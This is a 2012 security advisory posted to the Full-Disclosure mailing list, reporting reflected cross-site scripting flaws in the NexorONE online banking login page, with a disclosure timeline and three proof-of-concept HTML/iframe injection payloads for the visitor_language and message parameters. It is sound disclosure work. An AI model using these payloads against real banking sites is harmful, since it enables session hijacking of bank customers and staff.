[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] NexorONE Online Banking - Multiple Cross Site Vulnerabilities
From: "research () vulnerability-lab ! com" <research () vulnerability-lab ! com>
Date: 2012-02-05 18:09:49
Message-ID: 4F2EC5ED.1070304 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
NexorONE Online Banking - Multiple Cross Site Vulnerabilities
Date:
=====
2012-02-04
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=304
VL-ID:
=====
304
Introduction:
=============
NexorONE is the leading online banking software provider for Private International \
banks, Offshore Financian Institutions, Savings and Loans, Credit unions, Investmenet \
Fund Managers and Payement Processing Companies.
NexorONE has already been demployed to more than 200 financial entities worldwide, \
spread out throught 20 countries and in 12 different languages. with this market \
experience we know we can fulfill your business demands.
(Copy of the Vendor Homepage: https://www.nexorone.com/ )
Abstract:
=========
Vulnerability-Lab Team (Chokri B.A.) discovered multiple non-persistent Cross Site \
Scripting vulnerabilities on the NexorONE Online Banking Software.
Report-Timeline:
================
2011-10-05: Vendor Notification 1
2011-11-13: Vendor Notification 2
2011-12-17: Vendor Notification 3
2012-02-04: Public or Non-Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
A non-persistent cross site scripting vulnerability is detected on the NexorONE \
Online Banking Software. Successful exploitation of the vulnerability allows an \
attacker to hijack user/mod/admin sessions of the portal.
Vulnerable file(s):
[+] login.php
Vulnerable Param(s):
[+] ?visitor_language=
[+] ?message=
Picture(s):
../1.png
../2.png
../3.png
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with required user inter \
action. For demonstration or reproduce ...
PoC 1:
<div class="login_line2">_QUESTION_NEW_CUSTOMER <a \
href="register.php?visitor_language=english\ "><img \
src=http://www.vulnerability-lab.com/gfx/partners/vlab.png>" \
tabindex="4">_REGISTER</a> <=[x] </div></form>
PoC 2:
<div class="login_line2">_QUESTION_NEW_CUSTOMER <a \
href="register.php?visitor_language=english\\\ "><iframe \
src=http://www.vulnerability-lab.com onload=alert(vulnerabilitylab) height=800px \
width=900px> <=[x] " tabindex="4">_REGISTER</a></div></form>
PoC 3:
<div id="login">
<table cellspacing="0" class="message"><tr><td><center>Registration_successful>
<iframe src=http://www.vulnerability-lab.com onload=\"alert(vulnerabilitylab);\" \
height=\"800px\" width=\"900px\"> <=[x] </center></td></tr></table>
Risk:
=====
The security risk of the non-reflective cross site scripting vulnerabilities are \
estimated as medium.
Credits:
========
Vulnerability Research Laboratory - Chokri B.A. (Me!ster the White)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability- Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability for consequential or incidental damages so the foregoing limitation may \
not apply. Any modified copy or reproduction, including partially usages, of this \
file requires authorization from Vulnerability- Lab. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab or its \
suppliers.
Copyright © 2012|Vulnerability-Lab
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic